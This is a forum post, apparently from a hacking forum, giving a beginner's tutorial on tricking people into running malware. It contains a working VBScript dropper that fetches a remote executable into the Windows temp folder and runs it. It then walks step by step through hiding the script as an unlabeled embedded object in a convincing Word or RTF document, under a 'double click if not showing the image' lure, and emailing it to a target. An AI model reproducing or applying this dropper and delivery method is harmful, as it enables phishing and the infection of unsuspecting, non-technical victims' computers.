• Hesap Oluştur
  • Oturum Aç

[For Beginners] Making people clicking on your executable

privateloader    1

    • avatar

    privateloader  31-05-2021, Saat: 13:48

    Trying to make people click on your executable is a art nowadays, even if all the hooks are set in your fake email there is a problem of not been possible to send the executable. A good choice is create a Word document (.doc) or a Rich Text Format (.rtf) and insert a object.

    For this article i used a common vbs dropper that was configured to download and execute after the user double click in the object inside the document.

    Most people thinks that Word document are only harmful if macro is activated, they are wrong.

    101 lesson

    1 - Let's do this. Save the following code as file.vbs
    dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
    dim bStrm: Set bStrm = createobject("Adodb.Stream")
    xHttp.Open "GET", "", False
    with bStrm
         .type = 1 '
         .write xHttp.responseBody
        .savetofile "C:\Windows\temp\file.exe", 2 '
    end with
    Set objShell = WScript.CreateObject("WScript.Shell")
    objShell.Run("C:\Windows\temp\file.exe"), 1, True

    2 - Change to your remote file and keep C:\Windows\temp\file.exe as it is.
    (Use your own exe instead of file.vbs as it is detected. This is for demo purpose only)

    3 - Open Wordpad or Winword (In this example, i'm using Wordpad).

    4 - Create a good document with a logo and add as many elements as you can to make it believable like signature, etc.

    5 - Write the sentence "Double click below if not showing the image"

    6 - And then click on "Insert a object"

    7 - Select "Create from file" and select the vbs file

    8 - Right click in the icon and "Packager Shell Object Object" > "Rename Package" and remove the "label"

    9 - Save the document and send as attachment to your target email.

    Note: This method works only with non tech people. The reason why this method works is because users have more trust in clicking in a link inside a document than clicking directly on a exe.


    Virus Scan: Full of virus for file.vbs
    Not Scanned to not disclose method
    • avatar

    privateloader  31-05-2021, Saat: 17:53

    Live localhost demo for the article above...


Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  [FOR BEGINNERS] HACXX JS-DOWNLOADER IE RCE EXPLOIT 2021 - FREE DOWNLOAD privateloader 1 125 21-05-2021, Saat: 19:18
Son Yorum: privateloader
Konuyu Okuyanlar: 1 Ziyaretçi

Hızlı Menü: